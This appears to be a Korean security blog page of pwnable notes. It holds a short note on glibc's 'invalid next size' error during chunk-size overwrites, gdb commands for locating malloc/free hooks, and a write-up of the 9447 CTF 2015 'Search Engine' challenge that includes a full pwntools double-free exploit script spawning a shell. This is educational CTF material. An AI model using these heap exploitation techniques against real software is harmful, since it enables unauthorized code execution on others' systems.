분류 전체보기

[pwnable.kr] dragon

2018. 10. 17. 19:00

[pwnable.kr] fsb

2018. 10. 16. 00:42

0ctf 2017 babyheap 문제를 푸는데, chunk의 size를 조작해서 free()하고 재할당하려는데 자꾸 오류가 발생한다 ㅡㅡ;


*** Error in `/home/0ctf_BabyHeap2017/0ctfbabyheap': free(): invalid next size (fast): 0x0000555555757040 ***


위와 같은 오류가 발생하는데... 대체 뭐가 문제인거지 ㅁㄴㅇㄹ 하면서 열심히 찾아보면서 원인을 알아내려했는데

나와 같은 에러때문에 고민하시는 분이 없는건지, 정확한 자료가 나오지않았다가 방금 갑자기 깨달아서 글로 남긴다ㅇ



그냥 에러 그대로였다. invalid next size다. 

allocated chunk와 freed chunk가 있을 때 인접한 앞/뒤 chunk의 주소를 prev_size와 size로 계산하게 되는데, 

chunk를 free()하게 되면 next chunk(chunk address + size)로 접근해서 prev_inuse bit를 바꿔주게된다. 그런데 이 size를 조작하게 되면 다음 chunk를 찾지못해서 오류가 발생한다.


즉, 위 에러가 뜬 이유는 chunk를 free()하고 (해제한 chunk + 조작된 size)에 있는 chunk의 prev_inuse bit를 바꿔주러갔더니? 

웬걸, 아무것도 없넹??? 해서 발생한것이였다...;



그러므로 size조작을 할때 위와 같이, next chunk의 위치를 제대로 잡을 수 있는 size로 조작해주는게 좋다.

끝!



아 참고로 이분이 heap에서 발생하는 에러에 대해서 pseudo-code잘 정리해두셨길래 링크남기고 글을 끝낸다.

http://dokydoky.tistory.com/460


'Pwnable!!' 카테고리의 다른 글

[main_arena_offset] libc파일에서 main_arena 오프셋 구하기  (0) 2019.01.27
[C] read 함수  (0) 2019.01.21
gdb에서 __malloc_hook / __free_hook 주소 찾기  (0) 2018.10.06
pwntools 사용해서 ssh 연결  (0) 2018.07.23
setvbuf란?  (0) 2018.07.10

x/x &__malloc_hook

p/x &__malloc_hook


x/x &__free_hook

p/x &__free_hook



가끔 잊어먹어서 적어놓는다.

'Pwnable!!' 카테고리의 다른 글

[C] read 함수  (0) 2019.01.21
Heap Overflow Chunk Size 조작 (feat. invalid next size )  (0) 2018.10.09
pwntools 사용해서 ssh 연결  (0) 2018.07.23
setvbuf란?  (0) 2018.07.10
bash drop privileges  (0) 2018.07.06

[pwnable.kr] tiny_easy

2018. 10. 5. 21:57

[pwnable.kr] ascii_easy

2018. 10. 4. 00:51

[9447 CTF 2015] Search Engine

2018. 9. 30. 22:53

요즘 Heap 쪽을 공부하고 있습니다. 그래서 Shellphish팀에서 정리해놓은 how2heap문서를 보면서 공부를 하고 있는데, 처음부터 굉장히 어려운 문제를 잡은 느낌이 듭니다 ;; 이 문제를 본 것은 한달 전이지만 푼 것은 한달 후네요 ㅠ 아무튼 시작했으니 끝을 보긴해야해서 이렇게 write up으로 남겨봅니다.



예시가 너무 어렵습니다 Shellphish팀... 쉬운 문제없나요 ㅠ


Ever wanted to search through real life? Well this won't help, but it will let you search strings.

Find it at search-engine-qgidg858.9447.plumbing port 9447.


아무튼 문제는 위와 같습니다. 문자열 검색을 수행하는 바이너리를 하나 던져주는데, 보호기법을 확인해보면 아래와 같습니다.



Canary와 NX가 걸려있는데, 일단 한번 실행해보는게 좋을 것 같습니다.



주어진 바이너리를 실행하게 되면 3가지 메뉴가 주어지고 문자열을 추가(Index), 검색(Search)할 수 있습니다.



그리고 Search를 통해 단어를 검색하여 그 단어가 포함된 문장을 검색할 수 있고, 또 검색한 후 그 문자열을 삭제할지 말지를 결정할 수 있습니다.


이제 IDA를 통해 바이너리의 자세한 과정을 살펴보겠습니다.




while문안에서 메뉴를 출력하고 어떤 기능을 수행할지 선택하게 됩니다.



AddSentence함수를 살펴보면 위와 같이 구조체를 malloc을 통해 할당하여 입력받은 문장을 저장하는 것을 볼 수 있습니다.


또한 공백을 기준으로 word를 나눠서 이를 또 구조체를 malloc으로 할당해서 Linked list를 만들게 됩니다.


struct dic {
    char* word_addr;
    int word_size;
    char* sentence_addr;
    int sentence_size;
    struct dic* next;
};


그럼 이제 어디서 취약점이 터지느냐? 아래 Search함수를 보면 memset을 통해서 sentence에 저장된 내용은 NULL(0)으로 모두 지워버리고, free를 하는 것을 볼 수 있습니다. 하지만 word들이 저장된 Linked List에서는 이를 삭제해버리지 않기때문에, NULL값을 검색하게되면 이미 삭제되었던 값을 다시 한번 삭제하고 free할 수 있게 되어 double free bug가 발생하게 됩니다.




그러므로 우리는 여기서 fastbin list를 HEAD -> B -> A -> B .. 형식으로 만들 수 있고, B를 2번 할당할 수 있으므로 B의 fd 값을 수정하여 다음에 할당할 영역의 주소를 임의로 조작할 수 있습니다.


그런데 어디에 있는 값을 수정해야할까요?



main함수가 끝나는 ret에 break를 걸고 스택에 있는 값을 살펴보면 위와 같습니다. 0x40~~이 있는데 이 위치를 잘 조정해서, 아래와 같이해서 fastbin리스트에 넣게되면 0x40을 size로 보고 정상적으로 fastbin에 포함되게 됩니다.




하지만 저희는 스택값을 모르는데요?

그래서 스택값을 leak해야하는데, 이것은 아래 함수를 통해서 할 수 있습니다.


위 함수는 사용자로부터 숫자를 입력받고, 만약 숫자가 아닌값이 입력된다면 재귀적으로 다시 한번 자기자신을 호출하여 숫자를 입력받을 때까지 계속하게 호출되게 됩니다. 그런데 이 때 2번째 Select_choice함수를 호출하게 될 때, 이전 함수의 ebp가 남아있게 되는데 이 위치가 num+48에 있기때문에 num을 입력할 때, 문자열 48자리로 채우게 되면 printf로 출력될 때 NULL바이트를 만날때까지 출력되기때문에 스택주소를 leak할 수 있습니다.



자.. 이제 스택 주소도 구했겠다. 이제 library주소만 leak할 수 있다면 완벽할 텐데 말이죠. 그래서 여러가지 알아보던 중에 저희 팀의 chaem님이 올린 글을 보게됬는데, 여기서 smallbin을 이용해서 library주소를 leak할 수 있다는 것을 알게 되었습니다.



(0ctf2017) babyheap Write up에서 나온 smallbin을 이용하는 방법입니다.


6. 그리고 4번 chunk의 크기를 다시 smallbin 크기로 만들어주고 free합니다. free하면 smallbin 특성상 unsorted bin이 되기 때문에 fd와 bk에 main_arena+88 주소가 남게 됩니다. 이 점을 이용하면 dump를 통해 main_arena+88의 leak이 가능합니다.



fastbin 이외의 다른 bin들은 free되고 나면 데이터영역에 fd와 bk가 남게되는데, 이 때 다음 fd와 bk를 연결할 chunk가 없다면 libc의 <main_area+88>의 주소가 남게됩니다.


자. 이제 libc_base도 구했고, stack_address도 있으니 double free bug를 이용해서 ret에 원하는 주소를 쓰면 되겠습니다.


이것을 정리하면 아래와 같습니다.


  1. stack addresslibc_base leak
  2. oneshot_gadget 구하기
  3. ret를 oneshot_gadget으로 덮기
#!/usr/bin/env python
from pwn import *

conn = process("search")

def leak_stack():
	conn.recvuntil("3: Quit")
	conn.sendline("1")
	conn.recvuntil("size:")
	conn.sendline("A")
	conn.recvuntil("number")
	conn.sendline("A"*48)
	stack_addr = conn.recvuntil(" is ")[-10:-4]
	stack_addr = u64(stack_addr + "\x00"*2)
	conn.sendline("1")
	conn.recvuntil("word:")
	conn.sendline("A")
	return stack_addr

def Search(word, size):
	conn.recvuntil("3: Quit")
	conn.sendline("1")
	conn.recvuntil("size:")
	conn.sendline(str(size))
	conn.recvuntil("word:")
	conn.sendline(word)

def Delete(choice):
	conn.recvuntil("(y/n)?")
	conn.sendline(choice)

def AddSentence(sentence, size):
	conn.recvuntil("3: Quit")
	conn.sendline("2")
	conn.recvuntil("size:")
	conn.sendline(str(size))
	conn.recvuntil("sentence:")
	conn.sendline(sentence)

stack_addr = leak_stack() + 0x92 # fake size 0x40
log.info("stack_addr : 0x%x" % stack_addr)

#leak_libc  -  <main_arena+88>
AddSentence("A"*506+" small", 512)
Search("small", 5)
Delete("y")

Search("\0"*5, 5)
conn.recvuntil(": ")
libc_addr = u64(conn.recv(8)) - 0x3c4b78
log.info("libc_addr  : 0x%x" % libc_addr)
Delete("n")

# double free bug
AddSentence("A"*50+" dfb", 54) #A
AddSentence("B"*50+" dfb", 54) #B
AddSentence("C"*50+" dfb", 54) #C

# fastbin HEAD -> A -> B -> C -> NULL
Search("dfb", 3)
Delete("y") #C
Delete("y") #B
Delete("y") #A

# fastbin HEAD -> B -> A -> B -> C -> NULL
Search("\x00"*3, 3)
Delete("y") #B
Delete("n") #A

# fastbin HEAD -> B -> A -> B -> X ...
AddSentence(p64(stack_addr).ljust(54), 54) #B
AddSentence("A"*50+" dfb", 54) #A
AddSentence("A"*50+" dfb", 54) #B

# ret overwrite
oneshot = libc_addr + 0x45216
log.info("oneshot  : 0x%x" % oneshot)

payload = "A"*6
payload += p64(oneshot)
AddSentence(payload.ljust(54), 54) #B

conn.recvuntil("3: Quit")
conn.sendline("3")

conn.interactive()



이제 익스코드를 돌려보면 아래와 같이 쉘을 얻은 것을 볼 수 있습니다.



*후기

역시 heap은 어렵군요 ㅠㅠ 더 열심히 공부해야겠습니다. 분명 비슷한 문제를 이전에 풀어본거같은데, 할 때마다 heap은 헷갈리는 것 같습니다. 익숙치않아서 그런걸까요 ㅎㅎ; 그리고 저는 pwnalbe문제를 풀 때 주로 peda를 쓰는데, 역시 heap 문제 풀때는 pwndgb가 더 편한것같네요... 다음에 문제를 풀게 되면 한 번 이용해봐야겠습니다. 워낙 익숙하지않아서 후... 다음번에는 좀 더 문제를 빠르게 풀 수 있으면 좋겠습니다!

'Write-up > Pwnable' 카테고리의 다른 글

[Insomni'hack 2019] onewrite writeup  (0) 2019.01.21
[0ctf 2017] babyheap  (0) 2018.10.20
[noxCTF] The Black Canary writeup  (0) 2018.09.13
[PlaidCTF] ropasaurusrex  (0) 2018.08.27
[Codegate] BugBug  (0) 2018.08.22

[pwnable.kr] otp

2018. 9. 30. 18:59

[pwnable.kr] md5 calculator

2018. 9. 24. 20:40

[pwnable.kr] simple login

2018. 9. 24. 13:28

+ Recent posts